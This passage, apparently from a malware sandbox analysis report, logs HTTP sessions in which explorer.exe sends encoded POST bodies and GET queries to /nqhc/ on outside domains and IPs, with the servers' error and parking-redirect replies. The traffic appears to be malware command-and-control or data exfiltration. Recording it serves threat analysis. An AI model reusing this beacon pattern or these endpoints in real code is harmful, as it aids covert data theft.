                                                                                                                                                                          Dec 5, 2022 15:15:18.468009949 CET11207OUTData Raw: 45 4b 6b 39 33 75 46 32 38 4a 35 64 47 6c 77 4e 30 4c 50 48 6f 6d 70 31 6a 56 49 33 47 37 58 32 36 63 38 6a 58 4d 37 73 36 43 35 68 35 56 64 73 6c 51 39 4e 71 52 55 65 45 78 44 49 47 33 48 46 63 61 49 75 44 58 31 34 47 44 42 38 76 41 6c 6f 6f 2d
                                                                                                                                                                          Data Ascii: EKk93uF28J5dGlwN0LPHomp1jVI3G7X26c8jXM7s6C5h5VdslQ9NqRUeExDIG3HFcaIuDX14GDB8vAloo-N8J8elRURW~hX6VutWCw~VNVYd6Z1dJEcCwLcBmH7hlwqLgN5xlAYzHwsiK4KrP7zsnBstKhdV35HaVSKrUBDk5Ux7u5G62lwjMZvrOj7skTs7Vcguf9kJFdpexxTCjnNQWHuQWReZ9Q06GuysKnDYK1ofPbGq0tT
                                                                                                                                                                          Dec 5, 2022 15:15:18.832246065 CET11209INHTTP/1.1 400 Bad Request
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:15:18 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: d404 Not Found0
                                                                                                                                                                          Dec 5, 2022 15:15:19.080210924 CET11209INData Raw: 0a
                                                                                                                                                                          Data Ascii:


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          90192.168.11.204994764.190.63.11180C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:20:14.285463095 CET12847OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.popular.directory
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.popular.directory
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.popular.directory/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 78 43 54 61 61 61 43 64 58 43 72 6c 6f 4b 6e 34 57 51 34 63 74 34 6c 45 30 6d 30 5a 79 54 54 48 71 46 32 45 31 6f 73 68 37 76 7e 65 4f 50 6c 6c 54 50 7e 36 50 51 50 44 64 4e 75 45 71 72 63 34 61 30 53 48 6e 69 4d 58 46 4f 48 65 6b 75 74 47 78 62 71 32 58 66 28 73 76 73 30 6a 6d 59 58 55 72 74 53 6e 6c 67 42 37 52 45 58 66 66 4e 68 41 6e 68 57 42 4b 34 56 46 6e 4a 35 52 54 75 74 6d 32 67 6f 50 78 42 70 4c 28 68 57 6e 76 2d 35 74 54 4f 4b 4f 4a 35 61 59 34 67 66 76 78 77 4f 5a 6d 50 55 69 7e 65 75 32 77 63 46 79 62 36 44 51 72 59 61 69 5a 76 46 76 72 73 79 63 61 42 35 47 75 42 75 50 48 57 44 4a 7e 49 6e 37 6f 4f 5a 68 4a 58 4e 5a 36 56 43 51 41 46 42 4f 5a 6d 45 56 46 66 79 75 6f 76 4a 35 47 6b 59 66 69 4a 46 72 6a 73 36 68 75 50 43 46 45 77 34 39 32 65 42 7a 67 7a 5a 53 69 52 61 6d 4e 4d 4e 73 48 69 44 50 48 6f 6f 58 67 58 45 74 4c 70 43 57 4b 2d 58 42 6d 30 6a 65 43 37 53 4a 6f 64 64 31 68 64 70 42 28 58 76 67 6f 49 46 55 63 37 35 68 6b 4a 32 4f 32 69 33 37 45 48 56 52 77 62 36 4b 4e 4a 32 71 59 79 74 39 6e 4e 4f 74 66 7a 28 56 78 4c 4f 4c 4a 62 43 67 56 32 71 75 50 36 61 4f 77 4b 36 5a 45 44 6e 46 30 67 70 5a 5a 6b 37 77 41 6f 76 71 6b 64 74 63 7a 75 52 43 64 63 71 62 5a 6b 47 39 72 6a 56 63 68 32 5a 59 76 57 64 6e 55 30 4c 56 5a 57 46 64 48 71 38 4c 48 68 6f 4f 74 4f 35 77 63 38 69 6c 68 64 59 55 47 2d 61 69 66 78 55 36 76 4b 32 32 30 48 31 55 64 66 5a 43 33 6f 71 71 38 4e 6d 59 36 52 5a 63 78 78 71 4a 71 56 33 39 65 71 61 62 6a 56 66 42 70 34 4a 6b 63 79 7e 67 48 56 38 5a 4a 58 69 77 6e 34 32 58 33 36 41 78 61 43 45 33 64 51 46 67 6b 78 77 63 65 36 35 6c 79 79 69 5a 76 45 55 38 61 43 35 49 39 6a 44 34 75 36 75 4b 56 6a 7e 2d 64 5f 71 63 64 6d 34 47 75 43 39 51 6b 61 6e 33 38 53 71 47 33 41 4d 6c 78 58 6d 77 72 69 6c 4c 55 53 4f 49 72 54 31 30 32 50 4c 77 66 34 78 69 54 72 63 51 38 33 28 63 61 62 48 6a 52 42 38 79 66 4b 70 56 4f 48 46 72 68 58 64 72 66 35 35 43 34 36 34 6f 50 6d 59 4f 72 4e 48 36 4a 66 6b 41 73 39 7a 46 75 6b 39 6d 6b 44 51 4f 57 52 4b 6f 73 35 78 35 67 41 73 51 6a 62 41 57 62 4c 6e 53 36 5f 34 34 50 6a 46 77 77 78 42 6a 39 7a 64 6f 67 6d 57 6c 30 4e 53 33 6a 73 54 47 5a 75 4e 68 6f 5a 78 73 38 52 50 66 4a 4a 6c 4a 68 35 67 55 77 61 4e 6f 46 61 78 50 55 4d 74 52 53 47 4c 2d 54 52 63 42 53 6b 7e 46 64 37 7a 72 39 5f 6a 44 52 6a 51 51 39 43 57 6d 6f 33 4c 66 69 4b 74 56 58 62 43 55 33 79 6c 37 5a 6d 48 70 47 6b 42 73 53 6f 59 7a 7e 37 5a 4c 4d 56 76 68 4a 78 32 46 45 50 71 43 64 5a 37 6b 37 75 73 30 76 69 73 50 6e 74 70 50 7e 4b 71 2d 4f 34 5a 73 53 63 58 69 68 59 67 6b 71 6d 67 4c 58 74 38 6a 58 65 69 6a 6d 56 6b 75 4b 47 66 66 57 4a 63 6a 4e 34 51 69 51 6f 41 4a 6f 43 4e 6d 31 63 38 30 34 64 38 74 6c 71 59 73 41 4c 31 45 57 76 64 4b 47 6b 71 7a 65 35 4f 33 4d 31 33 67 76 2d 78 62 38 63 37 45 72 7a 71 5a 61 77 42 38 70 79 30 36 32 7a 38 6a 58 75 68 64 38 69 74 37 45 55 51 69 49 36 45 7a 32 66 54 50 54 78 71 41 43 45 30 34 37 2d 79 4a 72 54 79 6a 67 6f 63 6b 7e 4b 6e 36 67 30 59 55 38 67 4b 46 30 70 56 2d 52 79 30 78 52 52 34 38 35 61 76 63 59 6d 7a 58 55 44 63 64 31 43 59 59 77 68 48 44 4b 43 6b 77 62 5a 61 33 70 31 4f 6d 4f 41 38 65 77 35 61 45 64 33 46 45 67 58 6f 79 6f 41 5a 68 75 67 47 70 64 42 47 37 58 4c 56 56 74 53 7e 6a 39 74 46 7a 51 67 48 78 4d 45 64 76 55 7a 75 36 39 35 6b 39 30 34 78 50 73 47 41 6f 59 39 53 64 45 48 72 6e 4e 66 31 35 62 35 42 47 44 6e 6b 56 7a 39 72 70 49 6f 7e 7a 43 79 66 32 6e 62 45 4b 76 38 4d 41 6a 31 76 68 76 62 65 46 59 64 7e 34 68 35 50 56 51 49 4a 46 7a 5a 6b 66 64 63 35 70 46 5f 66 55 72 63 39 62 75 73 34 47 74 69 51 66 65 51 61 79 69 4d 4d 44 7e 32 6b 31 73 4d 59 52 63 32 37 68 6f 46 6b 38 47 33 48 4c 64 51 73 59 67 71 67 63 79 65 45 35 42 4e 76 68 58 41 53 6b 4a 63 4d 61 31 33 55 32 54 68 6b 31 54 72 4c 49 64 72 47 38 71 79 5a 55 6e 4d 4f 4e 4a 68 46 42 50 63 7e 76 6d 72 50 49 71 2d 36 4b 62 59 32 2d 4b 77 67 69 79 62 6b 63 53 75 59 71 63 43 69 65 77 53 30 54 32 4f 64 36 76 4c 38 58 6a 42 75 50 46 2d 62 4b 7a 5f 50 51 28 69 55 68 6d 32 59 39 55 48 41 4d 65 46 65 68 34 45 42 42 50 35 62 35 51 4c 4e 74 36 52 55 58 71 56 6f 75 4c 47 38 5f 71
                                                                                                                                                                          Data Ascii: 7nWHV=xCTaaaCdXCrloKn4WQ4ct4lE0m0ZyTTHqF2E1osh7v~eOPllTP~6PQPDdNuEqrc4a0SHniMXFOHekutGxbq2Xf(svs0jmYXUrtSnlgB7REXffNhAnhWBK4VFnJ5RTutm2goPxBpL(hWnv-5tTOKOJ5aY4gfvxwOZmPUi~eu2wcFyb6DQrYaiZvFvrsycaB5GuBuPHWDJ~In7oOZhJXNZ6VCQAFBOZmEVFfyuovJ5GkYfiJFrjs6huPCFEw492eBzgzZSiRamNMNsHiDPHooXgXEtLpCWK-XBm0jeC7SJodd1hdpB(XvgoIFUc75hkJ2O2i37EHVRwb6KNJ2qYyt9nNOtfz(VxLOLJbCgV2quP6aOwK6ZEDnF0gpZZk7wAovqkdtczuRCdcqbZkG9rjVch2ZYvWdnU0LVZWFdHq8LHhoOtO5wc8ilhdYUG-aifxU6vK220H1UdfZC3oqq8NmY6RZcxxqJqV39eqabjVfBp4Jkcy~gHV8ZJXiwn42X36AxaCE3dQFgkxwce65lyyiZvEU8aC5I9jD4u6uKVj~-d_qcdm4GuC9Qkan38SqG3AMlxXmwrilLUSOIrT102PLwf4xiTrcQ83(cabHjRB8yfKpVOHFrhXdrf55C464oPmYOrNH6JfkAs9zFuk9mkDQOWRKos5x5gAsQjbAWbLnS6_44PjFwwxBj9zdogmWl0NS3jsTGZuNhoZxs8RPfJJlJh5gUwaNoFaxPUMtRSGL-TRcBSk~Fd7zr9_jDRjQQ9CWmo3LfiKtVXbCU3yl7ZmHpGkBsSoYz~7ZLMVvhJx2FEPqCdZ7k7us0visPntpP~Kq-O4ZsScXihYgkqmgLXt8jXeijmVkuKGffWJcjN4QiQoAJoCNm1c804d8tlqYsAL1EWvdKGkqze5O3M13gv-xb8c7ErzqZawB8py062z8jXuhd8it7EUQiI6Ez2fTPTxqACE047-yJrTyjgock~Kn6g0YU8gKF0pV-Ry0xRR485avcYmzXUDcd1CYYwhHDKCkwbZa3p1OmOA8ew5aEd3FEgXoyoAZhugGpdBG7XLVVtS~j9tFzQgHxMEdvUzu695k904xPsGAoY9SdEHrnNf15b5BGDnkVz9rpIo~zCyf2nbEKv8MAj1vhvbeFYd~4h5PVQIJFzZkfdc5pF_fUrc9bus4GtiQfeQayiMMD~2k1sMYRc27hoFk8G3HLdQsYgqgcyeE5BNvhXASkJcMa13U2Thk1TrLIdrG8qyZUnMONJhFBPc~vmrPIq-6KbY2-KwgiybkcSuYqcCiewS0T2Od6vL8XjBuPF-bKz_PQ(iUhm2Y9UHAMeFeh4EBBP5b5QLNt6RUXqVouLG8_qsE8(jyEL3JiuK~mhDpDF-YhhnIsyjVUS2wPssSOQs2jxih2LKEudJYSxwRFhsLU5S364XRzNSIekrNXw0cFMFP7FshjrTxYL6rBI3wZVZuJ(x0g7lMbfz8wMXq0eKnADAhy6yaLpcix0xMXHVx8XRTG5cKBe1gtXxFM54txzK7YGSy7uLmsg3B6oUX74pACLwAzjgi8EkFGBQ8_G2i8LLkOKvpKs-bGZwrpC5D-G4srOMBZdtVhtRN60wqhdG(Foh~prIl3KaQCTstyJ3(VoiLQRPVKS8Z8csm0Tpo7JqCKLMAbadxFnRfOgMRgCaXzfcZUlRqa2WGNi7CRXFkzPrdohKIgzcpJ6O(b1Q65r7pLyZNm0n0NvJuGp-0t6TB7qyCDVOjK2wjgiPzueI34Rhq6NB7tcFxUWFYI9yss59OqGdBMq_Wov-cuLqFgBwfRJosH1rqDBKlCvRmYaX9exFlKbM80sUBUQqNnef0erUcK11X2(vk2zoO9(XW4PPnpM5hfFjeWD87hFK2moBXnZen-XlXOZN2i(jhtvfVCu9KhwnsT7xYAgous0otd2FQ2vyLF3QZEbocGGsv1~L3WWtQf2f91y1zXb_AG0myqaBhDzpmuMFfIOpZHyaRn2rVvibNdrzn6jfo38GYN0lP3aFBEgy2bTNvEtGZKzzhpvGhtH8eUe9ZelZWAM7loev8lfwJkSpEe15OqSuRJcOD-8M2K4hILuHQr93lPw3G_stPyTthj0elyWIPc(TwNHTnrAv2QShpL41pS5UVpkk7vEPm_iRtSFhP0f91GAigccEttEgrWBnlHy3GSUOwz0nhACD7qXIvn1v0aIyjV6H8OXjNpLrbvCtaOefWeKA2OSj3_awdJcsZwZbvEmzdIAaSoma4P7J31YSe5M_lx9AuAE-3TLww90YCAp16PZdwhOklq(yq9d-gqI0y8i1vuWAKcgJ~YChbGbnkhaZDe98Wzz-o9o1EWTMKmWgmHBtqLj41jC1jE7Va5CxnaNQGUbRU81oboaOXfcIn5rvm92tGVYPPzN7bTHuZ0pv3egsG0fg9jH8uH85gtKv51a_BSZkQqHoEG~ezE6V447hv2tbxLlL9xp9mcHs(x0037OdlCWBfAdoUMjAJ-2p(KgLpf8DzjnXTVvCGPWD23ye0Zv-z2B7v5UuFC6aYrw3qQuf3PjFCLHcTQ0cQlqBR7GfOVQ7RQGeNdTlg3VGmW5k68oa(901OjBcsTppTsGNLprfkBOysrP4AMNlLSXasHDNMs2_HObK~nlGHJqxHtCF~nXwKUt2nq3mnUFKd7SHcQQpLcnKmTzZJlraoMIR~Y085zbOSoLn(MCUfXM61orkvNpYdb3WOYgjwNXaY_ZBsVN9A1o39Qa6pTiuJGnj70mGhbc4XBHoPJXNJoQM1iB2xhE5pFkFvtwMADvWRIZ2FitoKt2vJ5JXUnCul9pB3rKxr0gDGbQ0sb(if7d0(Risg8WGAW6LaBh5FNWQQsxq5adjoBRrN0A9pAulbaIoPcnxyAHYvU9CA21-4-fI6Xkas1xNrYQARAbrWCAXBmp2HMQ5bQjaajxZP29OBlYPGnTqTZ72mzQmwSfQJOodI_Kujwgsg9og5h5tlVSBNibg20kuPOE91fTPlcTo~yL1agH_pa1vt8cyqU6Eogr6XD~Olhb1JPIy8ssFJstHuSqmQK1H0HSTgXAb3n4j8rp_e5kljQXrJEqdK5nzSzmB39n7236KHPUSHXGA2VMZIowKVvqtKOQqwMKT0QqGkZWWdgF_M-bdEKBTshGz2y8jCp~IEllYP6iYOo1RDANaZp(iMjh35I537RQGqI3l3-EOn6UiWRxwuA1itV8-fUpoKAk-B-4Q6p6xl-fC~L75GfcG7PwM~Pf1RI1gt-QTFmQKXfLUudqTQ-KbwQBN9aqa3fvQWuPo9vD1UOlFi-bYaG4Fy5FUScFYJiUAVcGSbxydEGFJno29wVuBEowAn4WjeKjqWjn3rvN7j7lLdInyNy(DjBr5PfYEk3J90-k0vGeG(Jt4vITrvEpjwxStPGt3JB4dpsUrU7ac60PXeqyWOOs30WTpNxXMchpDJ8K9w5Y7fwFtNn5f1NQzO9s-D6pJ5p4T7zrP9GBfoI7Ray89(tyM8lD_oWiQAGcgLWi7XfmfFi92z2eR4NX3VsQ0CICwLCoMfVATaYudvhsetcWN0si6GD0Pl5BwjM5KOqxkpjcQ9cGh3J9KTiqw5ADY(QknmDTqJ6HKl_xQ9VyYgdwGX2vuB9Q8SMoDXkWxfPCUacCakbPwibTBCPy02Rp5NTWvafSFstfUOqGx~Bux5K3kNPIyBT7V9hXBlHfD~lBi8mobVYHbqBw9p-OEl1S1DB5Es-yk6fBGU_AEyun9pmJF10pxEL9_P9EnR7PIxbxug83-CpdyHhE3XIyysuBJtI84ZnwiPYExm0DpajC144(LHkYky9S7sJaahkA1re4b8Bz6dnlXM33XWkRjan1EbvyivYsL1JtPJh9rhNvADAxCcvLAvyxw6VKUT5j4VA4nU74s72q_RUbbNWEXWSxS8vUaB2~4HEIakuUSjwZtPibxwlBAPwIy0R165wv3m8rFNVAFs6RnXan66XfyDyfRK28oWIS_0PuR0DecOsDN9o1_bjHwHwCDAY31d6VcZL6yeN21NqEb5PQHy2unEXfmIFKe89g2pVwljjWLcgM8RpEgiAAZOt
                                                                                                                                                                          Dec 5, 2022 15:20:14.285583019 CET12854OUTData Raw: 52 39 34 42 65 49 75 7e 44 53 43 28 59 33 32 49 72 4e 51 66 6a 45 59 35 67 65 37 7a 4a 67 2d 62 59 44 72 42 6f 43 6c 46 55 51 78 73 37 6e 79 79 61 31 30 33 46 31 32 73 5f 76 35 59 39 43 79 6d 71 55 54 4f 70 58 4a 30 4e 6d 44 38 38 67 32 30 38 35
                                                                                                                                                                          Data Ascii: R94BeIu~DSC(Y32IrNQfjEY5ge7zJg-bYDrBoClFUQxs7nyya103F12s_v5Y9CymqUTOpXJ0NmD88g2085EG45eEyhJp7cRPMZkttBE~Co_pijC5Z3izfn-89q9oKLP8efdy5OsJN3GxCypbqJORAbNY7N-foaFKTMyEHzDbcRAQ7AGbQ1uiJC0tswn5sURs3iBAw9anlJ-EaVTIjfviDx9MdFf(W8XmQuN5MOA712ZZBh2HLox
                                                                                                                                                                          Dec 5, 2022 15:20:14.296243906 CET12857OUTData Raw: 62 51 4b 45 30 78 70 39 31 52 51 49 35 72 35 43 4b 74 6d 52 63 37 58 6a 6a 34 36 53 37 42 6c 70 46 53 45 4a 69 6a 48 36 52 69 42 6b 6b 56 32 28 61 6d 69 46 59 62 5a 64 31 38 4b 42 42 5a 42 64 37 46 61 6c 5f 4d 56 6b 58 68 4b 76 4e 6a 4d 30 56 63
                                                                                                                                                                          Data Ascii: bQKE0xp91RQI5r5CKtmRc7Xjj46S7BlpFSEJijH6RiBkkV2(amiFYbZd18KBBZBd7Fal_MVkXhKvNjM0VcGI-2r(lAN4TZKI-D3I9RtcGoqWub4M7biQ95sQxwYg4bX1FHIhl6P(2iSujxywr1RLvqaJysB6vuoykYVq67kupHK~AIv5atlmvsV4XRDKcL9KRbq1HXNGEg5axUNF-Ci58a3y1Z3SZPIGXJ-YzDMhQOsLpdf1tQ7
                                                                                                                                                                          Dec 5, 2022 15:20:14.296521902 CET12858INHTTP/1.1 403 Forbidden
                                                                                                                                                                          date: Mon, 05 Dec 2022 14:20:14 GMT
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                          server: NginX
                                                                                                                                                                          content-encoding: gzip
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
                                                                                                                                                                          Dec 5, 2022 15:20:14.296587944 CET12865OUTData Raw: 71 76 58 5a 67 45 71 75 41 4a 50 57 6c 49 37 45 69 31 41 51 77 35 49 4c 36 33 49 5a 6a 53 6f 7e 45 59 7a 69 6e 75 34 67 33 30 68 45 69 5a 59 6d 42 77 6d 72 61 64 75 32 71 30 47 6d 63 46 54 63 77 7e 65 59 62 76 54 52 70 33 67 61 76 56 30 53 43 49
                                                                                                                                                                          Data Ascii: qvXZgEquAJPWlI7Ei1AQw5IL63IZjSo~EYzinu4g30hEiZYmBwmradu2q0GmcFTcw~eYbvTRp3gavV0SCIki2ahQhkeAzjIeEqvbt5Y8CgMKOKRXElKdDCKauihRs5qGdr-9x3vw0arT5AfCenhMWY9oowgjWIcZqzHQe30JuDLpv8UU_QognocMHcSNe51qqcm24JnU1e-QdmGcQyAIjKQfSTR9cxD(yMsqv(XVwoYBWpdLaM5
                                                                                                                                                                          Dec 5, 2022 15:20:14.296915054 CET12868OUTData Raw: 65 78 43 47 37 70 62 7a 56 72 58 68 72 44 65 38 61 67 70 45 43 64 73 69 4c 64 41 6e 76 7a 79 35 73 51 47 54 58 32 43 72 66 66 58 39 6e 38 46 39 75 72 47 31 4c 6d 50 55 67 48 4d 51 6b 66 33 46 7a 48 30 74 65 71 34 73 4a 30 7a 57 49 46 43 7a 37 33
                                                                                                                                                                          Data Ascii: exCG7pbzVrXhrDe8agpECdsiLdAnvzy5sQGTX2CrffX9n8F9urG1LmPUgHMQkf3FzH0teq4sJ0zWIFCz73FE-hqusxxApwV2-KcCfpvjkCEknlWR9TMjbunHDBPmpAOFZXpuMC2~0llMbqC9dp_Md0Bof3UASiZESiSg-LZXVPO9aV9FpKfjxbIt5MuIIrVBzCwXofz~O7Fa7fCM9RpbvfHln4F4SgaGcS6qhRZyU1klRLlvIhB
                                                                                                                                                                          Dec 5, 2022 15:20:14.297236919 CET12870OUTData Raw: 33 51 56 45 32 44 33 51 31 59 69 38 57 56 7a 36 65 56 6c 72 51 67 68 56 39 47 4b 6f 48 74 4e 39 58 59 57 75 45 52 34 58 61 4c 55 72 30 6e 56 49 38 42 6b 31 48 7a 75 7a 75 5a 32 6e 75 62 66 53 6a 6c 36 45 72 4c 62 71 77 4e 65 73 7a 46 69 74 51 53
                                                                                                                                                                          Data Ascii: 3QVE2D3Q1Yi8WVz6eVlrQghV9GKoHtN9XYWuER4XaLUr0nVI8Bk1HzuzuZ2nubfSjl6ErLbqwNeszFitQSdSZfef6hIICz1m_s6JIR86alclDN6e7IpAed0ulL0FrcS6QcVwNn2wcdZzdxFT-qRJk8-5SRv0w5lEEzNLXt3U2mkbmNzhhybK3FJI3iVflr5kAVQ6bLHnthOlH1ZHtozaiC4ilm9XiOe(_NK00s1tp10ALF0KLro
                                                                                                                                                                          Dec 5, 2022 15:20:14.297419071 CET12880OUTData Raw: 59 6d 53 6f 32 32 53 6f 54 6d 4d 33 68 31 59 76 41 30 2d 49 39 35 53 4a 4d 49 75 78 31 48 72 71 42 70 51 77 4c 68 58 47 5a 50 4f 4d 34 33 53 32 4f 6e 79 41 77 73 5f 76 63 78 4b 36 57 4b 6f 4a 31 57 41 6d 78 63 50 78 4a 33 6e 54 62 4a 4e 77 4f 4a
                                                                                                                                                                          Data Ascii: YmSo22SoTmM3h1YvA0-I95SJMIux1HrqBpQwLhXGZPOM43S2OnyAws_vcxK6WKoJ1WAmxcPxJ3nTbJNwOJ9~VvbJbwNdwbML7v1tdKMKNK4KFGozcGiNed77ueaL25i~iG5RzdEnuE0f6CWKl8DlxusYDRBDEE45LqGfsvGohRdg-CKKRn6UE2ffB~a5I5XqncmadHxu0fZfqany3QzPvFuksst5sdhPelMpwzzHQb2pBTDWDfp
                                                                                                                                                                          Dec 5, 2022 15:20:14.307419062 CET12883OUTData Raw: 41 69 74 71 46 76 33 45 78 62 46 38 43 77 39 67 74 68 6e 76 44 35 38 53 7a 72 69 75 4f 57 2d 28 71 35 6b 76 6a 6d 54 38 62 51 66 6f 48 39 42 38 79 71 55 37 56 59 32 70 59 76 78 49 74 44 44 44 62 34 36 57 56 7a 54 48 63 55 4b 4a 6f 61 2d 30 33 72
                                                                                                                                                                          Data Ascii: AitqFv3ExbF8Cw9gthnvD58SzriuOW-(q5kvjmT8bQfoH9B8yqU7VY2pYvxItDDDb46WVzTHcUKJoa-03r5aCzZ3NIpYCzOvD~fPIqXyjssGD80O8HE5dg3~lk8uYopXxO9rm0RUQfSuNwpYxBYrHK2HxAnYOysUKOKD2MTsEdIoXgmU8VRr_6QXCSXgbGwl8yjYbPA8t8ltqQDK4L6NF~hQ1(Zo9J8VlcV9P2udDzBdVpnIssr
                                                                                                                                                                          Dec 5, 2022 15:20:14.307590961 CET12886OUTData Raw: 66 43 67 4b 37 38 77 33 50 34 63 77 59 78 35 42 4a 77 79 75 77 59 71 72 76 37 65 54 55 6f 5f 30 69 32 35 4e 6b 50 34 5a 31 51 50 72 64 33 57 4c 54 78 4f 66 70 31 5a 69 35 47 4d 4d 5a 69 4d 50 44 73 77 5a 6b 52 35 55 4d 7a 36 76 5f 35 56 4c 74 73
                                                                                                                                                                          Data Ascii: fCgK78w3P4cwYx5BJwyuwYqrv7eTUo_0i25NkP4Z1QPrd3WLTxOfp1Zi5GMMZiMPDswZkR5UMz6v_5VLtsQ1mJY66E8331ks0enskXbR9OopSRgEyK7VbygvEQwrPXHgqkcm_ebqZESJH8wElrPyUaaV9WNVLx8TV90fPcx0KMqgojfU0e_yJTZWNMO8q(RWMLSb3PgQjkqukgayF7amNfsXLo7tiH2uOyFaC0yNASSRyYdt1Nv
                                                                                                                                                                          Dec 5, 2022 15:20:14.307756901 CET12887OUTData Raw: 78 6e 57 72 53 76 4e 67 6e 49 2d 6f 51 33 30 72 69 6d 30 6e 4f 6d 76 38 68 77 77 36 31 4e 61 58 6c 4f 79 78 31 43 62 79 66 6d 4f 4b 6b 73 61 44 31 33 4a 75 58 4d 35 33 50 66 46 47 52 62 4c 46 4d 64 54 36 6c 76 57 43 44 79 6f 58 5a 30 55 6d 44 66
                                                                                                                                                                          Data Ascii: xnWrSvNgnI-oQ30rim0nOmv8hww61NaXlOyx1CbyfmOKksaD13JuXM53PfFGRbLFMdT6lvWCDyoXZ0UmDfSIUhRk65L2tMLjCyWwlhmWXUeKn6M(xrQJ1ZecwO9J2honrNyYxvMlo1q521lpU1cu-7tBwFPMh3mWOXkFbtdblhynewW9Uk7YYP5dOTGhn7CsQjPFc9cIIS9oGuGJT(OzizcknChOObCTyZOZ8bsoVVgJuGjF-p3
                                                                                                                                                                          Dec 5, 2022 15:20:14.307889938 CET12894OUTData Raw: 51 63 32 70 63 41 4e 34 54 78 77 66 62 7a 52 39 71 57 5a 44 52 46 34 72 57 71 6c 71 44 78 57 6f 6d 46 32 6d 5a 4e 45 79 6a 52 56 51 36 37 55 41 76 39 49 77 59 73 73 44 41 4b 50 33 61 71 35 39 57 41 6f 71 33 39 53 71 6a 34 6d 50 6c 44 6d 64 4f 38
                                                                                                                                                                          Data Ascii: Qc2pcAN4TxwfbzR9qWZDRF4rWqlqDxWomF2mZNEyjRVQ67UAv9IwYssDAKP3aq59WAoq39Sqj4mPlDmdO8C2P5XRNTbokhXwqU1U1SLx1RbTB3he6dIGe1GBL8ONWhTPo5ANC2c8ZydEoBVD10uwuECIjVoANncTxfz1SX00M1152xRk9yteSvimO8T1D6ebWfP9lAB4YzOPXEbg6bTdqGTJGWK8LYDwN7_dshoGPqek4UzFE8i


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          91192.168.11.204994864.190.63.11180C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:20:16.315078974 CET12895OUTGET /nqhc/?7nWHV=8A76ZuiHZi/Ws5XZc39lk8dA+0cq1C26/U6x4YBy0tC3IrxrLO2FUR3fJNTj7bksOQnQlH1KHIWsq/xPw5a7PJ/V5JkWh/vDvg==&jP1=y48xBzJ0mzz HTTP/1.1
                                                                                                                                                                          Host: www.popular.directory
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:20:16.404421091 CET12896INHTTP/1.1 302 Found
                                                                                                                                                                          date: Mon, 05 Dec 2022 14:20:16 GMT
                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                          content-length: 0
                                                                                                                                                                          x-powered-by: PHP/8.1.9
                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_X4E0vAwMEukwnXZt9GXMkn7CLA1T04240mFKC5UWkdTjQETFvfN7yq8ld8dnxCD4K3xqERChOV0JvKQuqAQ5Gw==
                                                                                                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                          last-modified: Mon, 05 Dec 2022 14:20:16 GMT
                                                                                                                                                                          location: https://sedo.com/search/details/?partnerid=324561&language=d&domain=popular.directory&origin=sales_lander_9&utm_medium=Parking&utm_campaign=offerpage
                                                                                                                                                                          x-cache-miss-from: parking-d7dbd8c4d-4r7pb
                                                                                                                                                                          server: NginX
                                                                                                                                                                          connection: close


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          92192.168.11.2049949192.232.217.12580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:20:21.577692986 CET12897OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.wellnessprodia.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.wellnessprodia.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
